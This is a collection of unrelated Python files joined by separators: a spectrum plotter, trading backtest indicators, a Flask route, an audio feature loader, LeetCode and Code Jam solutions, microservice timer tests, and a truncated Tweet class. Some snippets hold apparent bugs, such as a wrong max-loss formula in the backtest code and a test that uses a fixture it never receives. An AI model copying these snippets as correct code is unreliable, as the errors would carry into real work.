from argparse import Action
import argparse
from plot_functions import *
from matplotlib import pyplot as plt
from matplotlib import rc
from matplotlib import widgets
import matplotlib.image as image
import re
rc('text', usetex=True)
# Some tweaks
topValueForNumberOfLabels={ "0": 1.0,
"1": 0.94,
"2": 0.89,
"3" : 0.85,
"4" : 0.8 }
class AppendRange(Action):
def __init__(self,option_strings,dest,nargs='*',**kwargs):
super(AppendRange,self).__init__(option_strings,dest,nargs,**kwargs)
def __call__(self,parser,namespace,values,option_string=None):
rangeList=[]
rangeRegex=re.compile(r'([+\-]?\d+\.?\d+)-([+\-]?\d+\.?\d+)')
itValues=values
if any(isinstance(el,list) for el in values):
itValues=values[0]
for value in itValues:
result=rangeRegex.search(value)
if result:
rangeList.append((float(result.group(1)),float(result.group(2))))
else:
raise(ValueError("You did not specify a valid range"))
items = getattr(namespace,self.dest,None)
if items is None:
items = []
for item in rangeList:
items.append(item)
setattr(namespace,self.dest,items)
def RangesY(value):
values=value.split()
if len(values) != 2:
raise argparse.ArgumentError()
return values
def Ranges(value):
values=value.split()
return values
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def ListOfFloats(v):
if any(isinstance(el,float) for el in v):
return v
floats=v.split()
listOfFloats=[]
for f in floats:
if f.lower() in ('-','nan','none','notfound'):
listOfFloats.append(None)
else:
listOfFloats.append(float(f))
return listOfFloats
def _generateParser():
parser=ArgumentParser(description='Plot an IR spectra.')
plotOptionGroup=parser.add_argument_group(title='Plot Options',
description='Options that affect the whole plot')
spectraOptionGroup=parser.add_argument_group(
title='Options that affect the each spectrum',
description="""These options will influence the settings for each graph.
If not mentioned explicitly each option can be specified multiple times
for each spectrum""")
fileOptionGroup=parser.add_argument_group(title='Spectra and Output File',
description="Specifiy as many spectra. The last argument is the output figure")
fileOptionGroup.add_argument('spectraDataFiles',nargs='+',type=FileType('r'),
action='store')
fileOptionGroup.add_argument('outputFile',nargs=1,type=FileType('w+'))
plotOptionGroup.add_argument('--distanceSubplots',type=float,nargs='*',
default=0.03,action="append",
help="The padding between the axis breaks.")
plotOptionGroup.add_argument('--labelXAxis',type=str,nargs=1,
action="store",
default=r"wavenumber [cm$^{-1}$]",
help="The label for the X Axis")
plotOptionGroup.add_argument('--labelYAxis',type=str,nargs=2,
default=[r'absorption [arb. units]',r'intensity [km\ mol$^{-1}$]'],
action="append",
help="The label for the Y Axis")
plotOptionGroup.add_argument('--majorTicksX',type=float,nargs='*',
action="store",
help="Set the minor ticks on the x axis.")
plotOptionGroup.add_argument('--minorTicksX',type=float,nargs='*',
action="store",
help="Set the minor ticks on the x axis.")
plotOptionGroup.add_argument('--plotLimitsX',nargs=1,
action=AppendRange,type=Ranges,
help="Set the range of the x axis by specifying the range (e.g. 4000-2000)")
plotOptionGroup.add_argument('--interactive',
action="store_true",
help="Set the range of the x axis by specifying the range (e.g. 4000-2000)")
plotOptionGroup.add_argument('--plotLimitsY',nargs=1,
action=AppendRange,type=RangesY,
help="Set the range of the y axis by specifying the range (e.g. 4000-2000)")
plotOptionGroup.add_argument('--image', nargs=1,
type=FileType('r'),action='store',help="Show image in plot")
plotOptionGroup.add_argument('--imagePosition',type=float,nargs=4,
action="store", default=[0.0,0.0,0.2,0.2],
help="4 floats: left,bottom,width,height. Starting from north west.")
spectraOptionGroup.add_argument('--colors',nargs='*',
action='store',
help="Set the color for each plot",default="k")
spectraOptionGroup.add_argument('--labels',nargs='*',
action='store',
help='The labels for each plot')
spectraOptionGroup.add_argument('--assignments',nargs='*',
type=ListOfFloats,action='store',
help='If specified for two graphs assignment lines are drawn')
spectraOptionGroup.add_argument('--invert',action="store",
default="false",nargs='*',type=str2bool,
help="Specify if plot should be inverted")
spectraOptionGroup.add_argument('--yshift',type=float,
nargs='*',action="store",default=0.0,
help="Shift the data along the y axis")
spectraOptionGroup.add_argument('--peakWidth',type=float,
nargs='*',action="store",default=5.0,
help="The width of the peaks for assignment.")
spectraOptionGroup.add_argument('--yaxisIndex', type=int,
nargs='*', action="store",default=0,choices=[0,1],
help="Select the y axis on which to plot.")
return parser
def _getValueForPlotOptionAtPosition(option,position):
if not isinstance(option,list):
return option
if len(option) < position:
print("Warning: option for index {} could not be found!".format(position))
return option[0]
else:
return option[position]
def _compileSpectraOptionsFromOptions(parsedOptions,file,index):
plotOptions={}
# If the option for index does not exist take the first one
# as it is the default option
colors=(_getValueForPlotOptionAtPosition(parsedOptions.colors,index),)
labels=(_getValueForPlotOptionAtPosition(parsedOptions.labels,index),)
assignments=(_getValueForPlotOptionAtPosition(parsedOptions.assignments,index),)
invert=(_getValueForPlotOptionAtPosition(parsedOptions.invert,index),)
yshift=(_getValueForPlotOptionAtPosition(parsedOptions.yshift,index),)
peakWidth=_getValueForPlotOptionAtPosition(parsedOptions.peakWidth,index)
plotOptions["filenames"]=(file,)
plotOptions["colors"]=colors
plotOptions["labels"]=labels
plotOptions["assignments"]=assignments
plotOptions["invert"]=invert[0]
plotOptions["yshift"]=yshift
plotOptions["peakWidth"]=peakWidth
return plotOptions
def _compilePlotOptions(parsedOptions):
plotOptions={}
plotOptions["distanceBetweenPlots"]=parsedOptions.distanceSubplots
plotOptions["labelsXAxis"]=(parsedOptions.labelXAxis,)
plotOptions["labelsYAxis"]=parsedOptions.labelYAxis
plotOptions["majorTicksX"]=parsedOptions.majorTicksX
plotOptions["minorTicksX"]=parsedOptions.minorTicksX
plotOptions["plotLimitsX"]=parsedOptions.plotLimitsX
plotOptions["plotLimitsY"]=parsedOptions.plotLimitsY
return plotOptions
def main():
parser=_generateParser()
arguments=parser.parse_args()
plotOptions=_compilePlotOptions(arguments)
# The number of axis interruptions is determined by length of plotLimitsX
numberOfSubplots=1
if plotOptions["plotLimitsX"]:
numberOfSubplots=len(plotOptions["plotLimitsX"])
figure,axes=setupPlot(numberOfSubplots,plt,**plotOptions,tight=False)
plt.subplots_adjust(bottom=0.1,left=0.2)
plots=[]
assignmentPoints=[]
for index,file in enumerate(arguments.spectraDataFiles):
spectraOption=_compileSpectraOptionsFromOptions(arguments,file,index)
if type(arguments.yaxisIndex) == list:
yaxes=axes[arguments.yaxisIndex[index]]
else:
yaxes=axes[arguments.yaxisIndex]
theplot,assignmentPoint=plot(**spectraOption,figure=figure,
axes=yaxes)
plots.append(theplot[0])
assignmentPoints.append(assignmentPoint)
# By default we merge the last groups as they are computational bands
if assignmentPoints:
experimentalBands=assignmentPoints[0]
computedBands=[]
for bands in assignmentPoints[1:]:
computedBands+=bands
if len(experimentalBands) != len(computedBands):
print("Warning: Experimental and computation band length do not match")
drawAssignments(experimentalBands,computedBands,axes[1])
if arguments.interactive:
plt.subplots_adjust(bottom=0.25,left=0.2)
axes[0][0].margins(x=1.0)
axisY1Slider=figure.add_axes([0.15,0.15,0.65,0.03])
axisY2MaxSlider=figure.add_axes([0.15,0.19,0.30,0.03])
axisY2MinSlider=figure.add_axes([0.6,0.19,0.30,0.03])
y2Min,y2Max=axes[1][0].get_ylim()
margin=0.2
y2MinUpper=y2Min+abs(y2Min*margin)
y2MinLower=y2Min-abs(y2Min*margin)
y2MaxUpper=y2Max+abs(y2Max*margin)
y2MaxLower=y2Max-abs(y2Max*margin)
step=int(y2Min/100)
y1slider=widgets.Slider(ax=axisY1Slider,label="Y1 Margin",
valmin=-0.5,valmax=5.0,valinit=1.0,
valstep=0.01,orientation='horizontal')
y2MaxSlider=widgets.Slider(ax=axisY2MaxSlider,label="Y2 Max",
valmin=y2MaxLower,valmax=y2MaxUpper,valinit=y2Max,
valstep=step,orientation='horizontal')
y2MinSlider=widgets.Slider(ax=axisY2MinSlider,label="Y2 Min",
valmin=y2MinLower,valmax=y2MinUpper,valinit=y2Min,
valstep=step,orientation='horizontal')
def updateY1(val):
maxY = y1slider.val
for axis in axes[0]:
axis.margins(y=maxY)
figure.canvas.draw_idle()
def updateY2(val):
maxY = y2MaxSlider.val
minY = y2MinSlider.val
for axis in axes[1]:
axis.set_ylim((minY,maxY))
figure.canvas.draw_idle()
y1slider.on_changed(updateY1)
y2MaxSlider.on_changed(updateY2)
y2MinSlider.on_changed(updateY2)
labels= [ l.get_label() for l in plots ]
# Insert Picture
if arguments.image:
insetPictureArray=image.imread(arguments.image[0].name)
newax=figure.add_axes(arguments.imagePosition,anchor='NW',zorder=5)
newax.imshow(insetPictureArray)
newax.axis('Off')
plt.figlegend(plots,labels,frameon=False,loc="upper right")
plt.subplots_adjust(bottom=0.1,
top=topValueForNumberOfLabels[str(len(labels))],
left=0.12,
right=0.88,
wspace=0.05)
#plt.show()
figure.savefig(arguments.outputFile[0].name,dpi=1200)
if __name__ == "__main__":
main()
|
import pandas as pd
import random as rd
import matplotlib.pyplot as plt
from sqlalchemy import create_engine
import datetime
import time
from learning_settings import Settings
def read_sql_merged(ai_settings):
"""read data from sql database"""
print("Enter Mysql")
engine = create_engine(ai_settings.sql_path_merged)
df = pd.read_sql(sql="select * from "+ai_settings.fetch_table, con=engine)
print("Out Mysql")
return df
def read_sql_wang2(ai_settings):
"""read data from sql database"""
print("Enter Mysql")
engine = create_engine(ai_settings.sql_path_wang2)
df = pd.read_sql(sql="select * from "+ai_settings.fetch_table, con=engine)
print("Out Mysql")
return df
def read_sql_backtesting(ai_settings):
"""read data from sql database"""
print("Enter Mysql")
engine = create_engine(ai_settings.sql_path_backtesting)
df = pd.read_sql(sql="select * from "+ai_settings.fetch_table, con=engine)
print("Out Mysql")
return df
def read_file(ai_settings):
"""read data from data_path"""
ai_settings = Settings()
file_path = ai_settings.file_path
loads = pd.read_excel(file_path)
return loads
def compute_ma(data,cycle):
"""compute ma value list"""
ma_cycle = list(range(len(data)))
for i in range(cycle):
ma_cycle[i] = data[0]
for i in range(cycle, len(data)):
ma_cycle[i] = (sum(data[i - cycle:i])) / cycle
return ma_cycle
def compute_easy_net(data, direction, result_show):
"""compute easy net value for target"""
print("compute easy net value...")
net_value = [1] * len(data)
max_value = 0
trade_times = 0
trade_succeed = 0
# initiate max retracement
result_show.max_retracement = 0
for i in range(1, len(data)):
#print("Easy net: "+str(i)+" of "+str(len(data)))
# compute trade success times for success rate
if direction[i - 1] == 0 and direction[i] == 1:
result_show.open = data[i]
result_show.ifstop = 0
trade_times += 1
elif direction[i - 1] == 0 and direction[i] == -1:
result_show.open = data[i]
result_show.ifstop = 0
trade_times += 1
elif direction[i - 1] == 1 and direction[i] == 0:
result_show.close = data[i]
if result_show.close > result_show.open:
trade_succeed += 1
if (result_show.close - result_show.open) / result_show.open \
> result_show.max_profit:
result_show.max_profit = \
(result_show.close - result_show.open) / result_show.open
if (result_show.close - result_show.open) / result_show.open \
< result_show.max_loss:
result_show.max_loss = \
(result_show.close - result_show.open) / result_show.open
elif direction[i - 1] == -1 and direction[i] == 0:
result_show.close = data[i]
if result_show.close < result_show.open:
trade_succeed += 1
if (result_show.open - result_show.close) / result_show.open \
> result_show.max_profit:
result_show.max_profit = \
(result_show.open - result_show.close) / result_show.open
if (result_show.open / result_show.close) / result_show.open \
< result_show.max_loss:
result_show.max_loss = \
(result_show.open - result_show.close) / result_show.open
elif direction[i - 1] == -1 and direction[i] == 1:
result_show.close = data[i]
if result_show.close < result_show.open:
trade_succeed += 1
if (result_show.open - result_show.close) / result_show.open \
> result_show.max_profit:
result_show.max_profit = \
(result_show.open - result_show.close) / result_show.open
if (result_show.open / result_show.close) / result_show.open \
< result_show.max_loss:
result_show.max_loss = \
(result_show.open - result_show.close) / result_show.open
result_show.open = data[i]
result_show.ifstop = 0
trade_times += 1
elif direction[i - 1] == 1 and direction[i] == -1:
result_show.close = data[i]
if result_show.close > result_show.open:
trade_succeed += 1
if (result_show.close - result_show.open) / result_show.open \
> result_show.max_profit:
result_show.max_profit = \
(result_show.close - result_show.open) / result_show.open
if (result_show.close - result_show.open) / result_show.open \
< result_show.max_loss:
result_show.max_loss = \
(result_show.close - result_show.open) / result_show.open
result_show.open = data[i]
result_show.ifstop = 0
trade_times += 1
#compute easy net value
if direction[i - 1] == 1:
net_value[i] = net_value[i - 1] * ((data[i] - data[i - 1]) / data[i - 1] + 1)
elif direction[i - 1] == -1:
net_value[i] = net_value[i - 1] * ((data[i - 1] - data[i]) / data[i - 1] + 1)
else:
net_value[i] = net_value[i - 1]
#update max retracement
if net_value[i] > max_value:
max_value = net_value[i]
retracement = (max_value - net_value[i]) / max_value
if retracement > result_show.max_retracement:
result_show.max_retracement = retracement
#update std and trade success times
result_show.std = compute_std(net_value)
result_show.trade_succeed = trade_succeed
result_show.trade_times = trade_times
print("easy net value compute has completed.")
return net_value
def compute_index_net(data,result_show):
"""compute index net value for target"""
print("compute index net value...")
net_value = [1] * len(data)
max_value = 0
# initiate max retracement
result_show.easy_max_retracement = 0
for i in range(len(data)):
#print("Easy net: "+str(i)+" of "+str(len(data)))
#compute easy net value
net_value[i] = data[i] / data[0]
#update max retracement
if net_value[i] > max_value:
max_value = net_value[i]
retracement = (max_value - net_value[i]) / max_value
if retracement > result_show.easy_max_retracement:
result_show.easy_max_retracement = retracement
print("index net value compute has completed.")
return net_value
def profit_per(data_close):
"""compute profit rate per day or other cycle"""
profit_per = list(range(len(data_close)))
profit_per[0] = 0
for i in range(1, len(data_close)):
profit_per[i] = (data_close[i] / data_close[i - 1] - 1) * 100
return profit_per
def profit_per_incycle(data_close, data_open):
"""compute profit rate per day or other cycle"""
profit_per = list(range(len(data_close)))
for i in range(len(data_close)):
profit_per[i] = (data_close[i] / data_open[i] - 1) * 100
return profit_per
def open_jump(data_close, data_open):
open_jump = list(range(len(data_close)))
open_jump[0] = 0
for i in range(1, len(data_close)):
open_jump[i] = (data_open[i] / data_close[i - 1] - 1) * 100
return open_jump
def set_xlable_visible(data):
"""set x lable's"visible config"""
ax = plt.gca()
visible_count = int(len(data) / 3)
for ind, label in enumerate(ax.xaxis.get_ticklabels()):
if ind % visible_count == 0: # set visible number of x lable
label.set_visible(True)
else:
label.set_visible(False)
if ind / int(len(data) - 1) == 1:
label.set_visible(True)
ax = plt.gca()
for label in ax.xaxis.get_ticklabels():
label.set_rotation(0)
def date_format(data):
"""set date format which wanted"""
for i in range(len(data)):
data[i] = str(data[i])
data[i] = data[i][0:10]
return data
def draw_plot(ai_settings, net_value, target_net_value, data_date):
print("waiting for plot drawing...")
# set window size for plot
plt.figure(dpi=128, figsize=(12, 6))
# set data for plot
plt.subplot(211)
plt.title("Stategy net value", fontsize=12)
plt.plot(net_value, color='Red')
plt.subplot(212)
plt.title(ai_settings.fetch_table + " index net value", fontsize=12)
plt.plot(range(len(data_date)), target_net_value)
plt.xticks(range(len(data_date)), data_date, rotation=0)
# set numbers visible for x lable
set_xlable_visible(target_net_value)
plt.show()
def compute_std(data):
"""compute var for data"""
compute_average = sum(data) / len(data)
var = list(range(len(data)))
for n in range(len(data)):
var[n] = (data[n] - compute_average) ** 2
compute_var = sum(var) / len(data)
return compute_var ** (1/2)
def compute_ema(data,cycle):
ema = [data[0]] * len(data)
ema[1] = data[1]
for i in range(2, len(data)):
ema[i] = (2 * data[i] + (cycle - 1) * ema[i - 1]) / (cycle + 1)
return (ema)
def compute_macd(data, short, long, mid):
dif_short = compute_ema(data, short)
dif_long = compute_ema(data, long)
dif = list(map(lambda x: x[0]-x[1], zip(dif_short, dif_long)))
dea = compute_ema(dif, mid)
macd = list(map(lambda x: x[0]-x[1], zip(dif, dea)))
macd = [i * 2 for i in macd]
return macd
def compute_sma(data, n, m):
sma = []
sma.append(data[0])
for i in range(1, len(data)):
sma.append((data[i] * m + (n - m) * sma[i - 1]) / n)
return sma
def compute_rsi(data, cycle):
rsi = []
real = []
data_roll = []
judge = []
abs_judge = []
data_roll.append(data[0])
judge.append(1)
abs_judge.append(1)
for i in range(1,len(data)):
data_roll.append(data[i - 1])
judge.append(data[i] - data_roll[i])
abs_judge.append(abs(data[i] - data_roll[i]))
for i in range(len(judge)):
if judge[i] >= 0:
real.append(judge[i])
else:
real.append(0)
rsi_a = compute_sma(real, cycle, 1)
rsi_b = compute_sma(abs_judge, cycle, 1)
for i in range(len(rsi_a)):
rsi.append(rsi_a[i] / rsi_b[i] * 100)
return rsi
def direction_mix(direction, direction_mix):
direction_final = [0] * len(direction)
for i in range(len(direction)):
if direction[i] ==1 and direction_mix[i] == 1:
direction_final[i] = 1
elif direction[i] == -1 and direction_mix[i] == -1:
direction_final[i] = -1
elif direction_mix[i] == 'follow':
direction_final[i] = direction[i]
elif direction[i] == 'follow':
direction_final[i] = direction_mix[i]
else:
direction_final[i] = 0
return direction_final
def direction_inverse(direction):
direction_final = [0] * len(direction)
for i in range(len(direction)):
if direction[i] == 1:
direction_final[i] = -1
elif direction[i] == -1:
direction_final[i] = 1
else:
direction_final[i] = 0
return direction_final
def direction_final(direction, direction_mix, data_date, ai_settings):
direction_final = [0] * len(direction)
for i in range(len(direction)):
if direction[i] ==1 and direction_mix[i] == 1:
direction_final[i] = 1
elif direction[i] == -1 and direction_mix[i] == -1:
direction_final[i] = -1
elif direction_mix[i] == 'follow' and direction[i] != 'follow':
direction_final[i] = direction[i]
elif direction[i] == 'follow' and direction_mix[i] != 'follow':
direction_final[i] = direction_mix[i]
elif direction[i] == 'follow' and direction_mix[i] == 'follow':
direction_final[i] = 0
elif data_date[i][-8:-1] == '15:00:00' and \
ai_settings.through_night == False and \
ai_settings.fetch_table[-2:-1] != '1d':
direction_final[i - 1] = 0
direction_final[i] = 0
elif data_date[i][-8:-1] == '15:15:00' and \
ai_settings.through_night == False and \
ai_settings.fetch_table[-2:-1] != '1d':
direction_final[i - 1] = 0
direction_final[i] = 0
else:
direction_final[i] = 0
return direction_final
def to_date(data):
data_date = [0] * len(data)
for i in range(len(data)):
data_date[i] = datetime.datetime.date(data[i])
return data_date
def random_int(a, b, times):
r = [0] * times
for i in range(times):
r[i] = rd.randint(a, b)
print(r[i])
return r
def m1_m2_direction(out):
direction = [0] * len(out)
for mark in range(2, len(out)):
if out.loc[mark -1, 'm1-m2'] > out.loc[mark - 2, 'm1-m2']:
direction[mark] = 1
elif out.loc[mark - 1, 'm1-m2'] < out.loc[mark - 2, 'm1-m2']:
direction[mark] = -1
else:
direction[mark] = direction[mark - 1]
mark += 1
return direction
def compute_roll(profit_ln, roll):
"""move time windows"""
profit_ln_roll = [0] * len(profit_ln)
for n in range(roll):
profit_ln_roll[n] = 0
for i in range(roll, len(profit_ln)):
profit_ln_roll[i] = profit_ln[i - 1]
return profit_ln_roll
def if_main(net_value):
if __name__ == '__main__':
return net_value |
from flask import Blueprint, render_template
from client.database import api
userpage = Blueprint('userpage', __name__, template_folder='templates',
static_folder='static')
userpage_url = 'account.html'
@userpage.route('/account', methods=['GET', 'POST'])
def display_userpage():
myBookings = api.get_user_details(000)
if myBookings is None:
myBookings = ["You have no bookings"]
return render_template(userpage_url, myBookings=myBookings)
@userpage.route('/details', methods=['GET', 'POST'])
def display_details():
return render_template('details.html')
|
import os
import librosa
import numpy as np
def load_data():
happy = []
sad = []
angry = []
fear = []
L = []
# Traversing through data
for root, dirs, files in os.walk('data'):
L.append(dirs)
foldere = L[0]
# print(foldere)
for i in foldere:
# print(i)
for root, dirs, files in os.walk('data/' + i):
# print(files)
for j in files:
x, sr = librosa.load('data/' + i + '/' + j)
mfccs = librosa.feature.mfcc(x, sr=sr)
# print(flatten(mfccs))
if i == 'angry':
angry.append(list(np.ndarray.flatten(mfccs))[:1000])
elif i == 'sad':
sad.append(list(np.ndarray.flatten(mfccs))[:1000])
elif i == 'fear':
fear.append(list(np.ndarray.flatten(mfccs))[:1000])
elif i == 'happy':
happy.append(list(np.ndarray.flatten(mfccs))[:1000])
# print(happy)
return angry, fear, happy, sad
|
# https://leetcode.com/problems/flatten-binary-tree-to-linked-list/
# Given a binary tree, flatten it to a linked list in-place.
# For example, given the following tree:
# 1
# / \
# 2 5
# / \ \
# 3 4 6
# The flattened tree should look like:
# 1
# \
# 2
# \
# 3
# \
# 4
# \
# 5
# \
# 6
# Recursive
def flatten(root): # modify root in-place
def _traverse(node):
if not node:
return
l, r = node.left, node.right
node.left, node.right = None, l
_traverse(l)
while node.right:
node = node.right
node.right = r
_traverse(r)
_traverse(root)
# Iterative DFS
def flatten(root):
stack = [root]
parent = None
while stack:
node = stack.pop()
if node:
stack += [node.right, node.left]
if parent:
parent.left = None
parent.right = node
parent = node
|
import asyncio
import time
import pytest
from tamarco.core.microservice import MicroserviceContext, task, task_timer
@pytest.fixture
def yaml_settings_ms_ctx(request, event_loop, inject_in_env_settings_file_path):
ms_ctx = MicroserviceContext()
event_loop.run_until_complete(ms_ctx.start())
yield ms_ctx
event_loop.run_until_complete(ms_ctx.stop())
async def test_deploy_name_loads_from_settings():
ms_ctx = MicroserviceContext()
await ms_ctx.start()
assert yaml_settings_ms_ctx.deploy_name
assert yaml_settings_ms_ctx.deploy_name == "test_tamarco"
await ms_ctx.stop()
class MicroserviceTestTaskContext(MicroserviceContext):
__init_time_stamp_exec = []
def __init__(self):
super().__init__()
self.time_stamp_exec = []
self.check_pass = False
self.settings.update_internal(
{"system": {"deploy_name": "test", "logging": {"profile": "DEVELOP", "stdout": True}}}
)
class TaskCheckedDecorator(MicroserviceTestTaskContext):
"""
Class check task decorator
"""
name = "TaskCheckedTaskDecorator"
@task
async def check_decorator(self):
self.check_pass = True
self.time_stamp_exec.append(time.time())
class TaskTimerPeriodic(MicroserviceTestTaskContext):
"""
Class check task periodic decorator
"""
name = "TaskTimerPeriodic"
@task_timer(interval=500, one_shot=False, autostart=False)
async def task_timer_periodic(self):
self.check_pass = True
self.time_stamp_exec.append(time.time())
class TaskExcecuteBeforePeriodicTime(MicroserviceTestTaskContext):
"""
Class check task periodic what execute after than periodic time
"""
name = "TaskExcecuteBeforePeriodicTime"
@task_timer(interval=500, one_shot=False, autostart=True)
async def task_exec_before_periodic_time(self):
self.check_pass = True
self.time_stamp_exec.append(time.time())
class TaskOneShot(MicroserviceTestTaskContext):
"""
Class check a task execute after a periodic time
"""
name = "TaskExcecuteBeforePeriodicTime"
@task_timer(interval=500, one_shot=True, autostart=False)
async def task_task_one_shot(self):
self.check_pass = True
self.time_stamp_exec.append(time.time())
class TaskMultipleTaskAndTimerTask(MicroserviceTestTaskContext):
"""
Class check multiple task:
* Task
* Periodic Task
* Periodic One Shot
* Periodic Task periodic before execute
"""
name = "TaskMultipleTaskAndTimerTask"
check_pass_one_shot = False
time_stamp_exec_one_shot = []
check_pass_task = False
time_stamp_exec_task = []
check_pass_task_periodic = False
time_stamp_exec_task_periodic = []
check_pass_task_execute_before_periodic = False
time_stamp_exec_task_execute_before_periodic = []
exception_task_times = 0
# Task is executed after a time (1500 miliseconds)
@task_timer(interval=1500, one_shot=True, autostart=False)
async def task_multiple_task_one_shot(self):
self.check_pass_one_shot = True
self.time_stamp_exec_one_shot.append(time.time())
# Task is executed immediately and after a period (1000 miliseconds)
@task_timer(interval=1000, one_shot=False, autostart=True)
async def task_multiple_task_executer_before_periodic(self):
self.check_pass_task_execute_before_periodic = True
self.time_stamp_exec_task_execute_before_periodic.append(time.time())
# Task is executed according to a period (500 miliseconds)
@task_timer(interval=500, one_shot=False, autostart=False)
async def task_multiple_task_periodic(self):
self.check_pass_task_periodic = True
self.time_stamp_exec_task_periodic.append(time.time())
# Task raises an exception and is stopped
@task_timer(interval=1000)
async def task_with_exception(self):
self.exception_task_times += 1
raise Exception
# Normal Task
@task
async def task_checked_decorated(self):
self.check_pass_task = True
self.time_stamp_exec_task.append(time.time())
@pytest.mark.asyncio
async def test_task_checked_decorator(event_loop):
test_microservice_task_decorator = TaskCheckedDecorator()
test_microservice_task_decorator.loop = event_loop
await test_microservice_task_decorator.start()
await asyncio.sleep(1)
# Check Test
assert test_microservice_task_decorator.check_pass, "Not executed task correctly"
assert len(test_microservice_task_decorator.time_stamp_exec) == 1, "Not executed once"
await test_microservice_task_decorator.stop()
@pytest.mark.asyncio
async def test_task_timer_periodic(event_loop):
test_microservice_periodic = TaskTimerPeriodic()
test_microservice_periodic.loop = event_loop
time_start = time.time()
await test_microservice_periodic.start()
await asyncio.sleep(1)
# Check Test
assert test_microservice_periodic.check_pass, "Not executed correctly timer periodic"
assert len(test_microservice_periodic.time_stamp_exec) >= 1, "Not executed 1 times. Once periodic interval"
assert (
test_microservice_periodic.time_stamp_exec[0] - time_start >= 0.5
), "Not executed correctly because time periodic is less than interval period time"
await test_microservice_periodic.stop()
@pytest.mark.asyncio
async def test_task_timer_periodic_excecute_before_sleep(event_loop):
test_microservice_periodic_execute_before_sleep = TaskExcecuteBeforePeriodicTime()
test_microservice_periodic_execute_before_sleep.loop = event_loop
time_start = time.time()
await test_microservice_periodic_execute_before_sleep.start()
await asyncio.sleep(1)
# Check Test
assert test_microservice_periodic_execute_before_sleep.check_pass, "Not executed correctly timer periodic"
assert (
len(test_microservice_periodic_execute_before_sleep.time_stamp_exec) >= 2
), "Not executed 2 times. The start time and a periodic interval"
assert (
test_microservice_periodic_execute_before_sleep.time_stamp_exec[0] - time_start < 1
), "Not executed correctly because time execute is greater than interval "
assert (
not test_microservice_periodic_execute_before_sleep.time_stamp_exec[1] - time_start < 0.5
and not test_microservice_periodic_execute_before_sleep.time_stamp_exec[1] - time_start > 3
), "Not executed correctly because time periodic "
await test_microservice_periodic_execute_before_sleep.stop()
@pytest.mark.asyncio
async def test_task_timer_oneshot(event_loop):
test_microservice_task_one_shot = TaskOneShot()
test_microservice_task_one_shot.loop = event_loop
time_start = time.time()
await test_microservice_task_one_shot.start()
await asyncio.sleep(1)
# Check Test
assert test_microservice_task_one_shot.check_pass, "Not executed timer correctly"
assert len(test_microservice_task_one_shot.time_stamp_exec) == 1, "Not executed 1 times"
assert test_microservice_task_one_shot.time_stamp_exec[0] - time_start >= 0.5, "Not executed in time correctly"
await test_microservice_task_one_shot.stop()
@pytest.mark.asyncio
async def test_multiple_task(event_loop):
test_microservice_multiple_task = TaskMultipleTaskAndTimerTask()
test_microservice_multiple_task.loop = event_loop
time_start = time.time()
await test_microservice_multiple_task.start()
await asyncio.sleep(4)
assert test_microservice_multiple_task.exception_task_times, 1
# Checked Task decorator
assert test_microservice_multiple_task.check_pass_task, "Not executed task checked decorated"
assert len(test_microservice_multiple_task.time_stamp_exec_task) == 1, "Not executed task checked decorated once"
assert (
test_microservice_multiple_task.time_stamp_exec_task[0] - time_start < 1
), "Not executed task checked decorated once the first"
# Checked Task Periodic
assert test_microservice_multiple_task.check_pass_task_periodic, "Not executed task periodic"
assert len(test_microservice_multiple_task.time_stamp_exec_task_periodic) > 1, "Not executed task once"
assert (
test_microservice_multiple_task.time_stamp_exec_task_periodic[0] - time_start >= 0.5
), "Not executed the first"
for i in range(1, len(test_microservice_multiple_task.time_stamp_exec_task_periodic)):
diff_time = (
test_microservice_multiple_task.time_stamp_exec_task_periodic[i]
- test_microservice_multiple_task.time_stamp_exec_task_periodic[i - 1]
)
assert diff_time > 0.45 and diff_time < 0.65, "No correctly periocity"
# Checked Task execute before Periodic
assert (
test_microservice_multiple_task.check_pass_task_execute_before_periodic
), "Not executed task execute before periodic"
assert (
len(test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic) > 1
), "Not executed task once"
assert (
test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[0] - time_start < 1
), "Not executed the first"
for i in range(1, len(test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic)):
diff_time = (
test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[i]
- test_microservice_multiple_task.time_stamp_exec_task_execute_before_periodic[i - 1]
)
assert diff_time > 0.95 and diff_time < 1.5, "No correctly periocity"
# Check Task One Shot
assert test_microservice_multiple_task.check_pass_one_shot, "Not executed task oneshot"
assert len(test_microservice_multiple_task.time_stamp_exec_one_shot) == 1, "Not executed task once"
assert test_microservice_multiple_task.time_stamp_exec_one_shot[0] - time_start >= 1.45, "Not executed the first"
|
from math import sqrt
def get_answer(length,level):
if(length-2 == level):
global num_of_answer
if(num_of_answer > 0):
for i in range(len(base_check)):
base_check[i] = False
for base in range(2,11):
base_check[base-2] = check_prime(get_num(num,base),base)
if (base_check[base-2] == False): break
div_num = 0
for each in base_check:
if(each == True):
div_num+=1
# print(div_num)
if(div_num==9):
output_f.write("%d "%get_num(num,10))
for i in range(8):
output_f.write("%d "%base_num[i])
output_f.write("%d\n"%base_num[8])
num_of_answer -= 1
else:
for i in range(2):
num[level+1] = i
get_answer(length,level+1)
def check_prime(num,base):
for i in range(2,int(sqrt(num))+1):
if(num % i == 0):
base_num[base-2] = i
return True
return False
def get_num(array,base):
answer =0
num = len(array)-1
for each in array:
answer +=(base**num)*each
num -=1
return answer
input_f = open("input.in", "r")
output_f = open("output.txt", "w")
input_f.readline()
output_f.write("Case #1:\n")
(str_length, str_num_of_answer) = input_f.readline().replace("\n","").split(" ")
length = int(str_length)
num_of_answer = int(str_num_of_answer)
num = []
base_check = []
base_num = []
for i in range(length):
num.append(1)
for i in range(9):
base_check.append(False)
base_num.append(0)
get_answer(length,0)
input_f.close()
output_f.close() |
import pytest
from PythonTesting.pytestsdemo.BaseClass import BaseClass
@pytest.mark.usefixtures("dataLoad")
class TestExample2(BaseClass):
def editProfile(self,dataLoad):
log=self.getLogger()
#error bcoz if u want to return data to the specific test then u have to add parameter
log.info(dataLoad[0])
|
class Tweet:
def __init__(self,time,pos_words,neg_words,emojis,emoticons,retweet_count,
favorite_count,listed_count,metion_count,follower_count_user,
friend_count_user,total_favorite,total_posts):
##Each tweet
self.time = time
self.pos_words = pos_words
self.neg_words = neg_words
self.emojis = emojis
self.emoticons = emoticons
self.retweet_count = retweet_count
self.favorite_count = favorite_count
